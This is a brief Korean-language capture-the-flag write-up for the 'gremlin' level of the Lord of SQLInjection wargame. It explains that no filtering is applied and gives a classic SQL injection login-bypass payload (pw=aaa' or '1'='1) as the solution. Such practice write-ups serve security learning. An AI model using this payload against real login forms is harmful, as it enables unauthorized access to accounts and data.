[ Lord of SQLInjection ] gremlin
포스트
취소

[ Lord of SQLInjection ] gremlin



문제 분석


  1. 로그인에 성공하면 문제를 해결할 수 있다.

  2. 특별한 필터링은 적용되어 있지 않다.



문제 풀이


기본적인 sql injection 공격을 하면 해결할 수 있다.

1
?id=aaa&pw=aaa' or '1'='1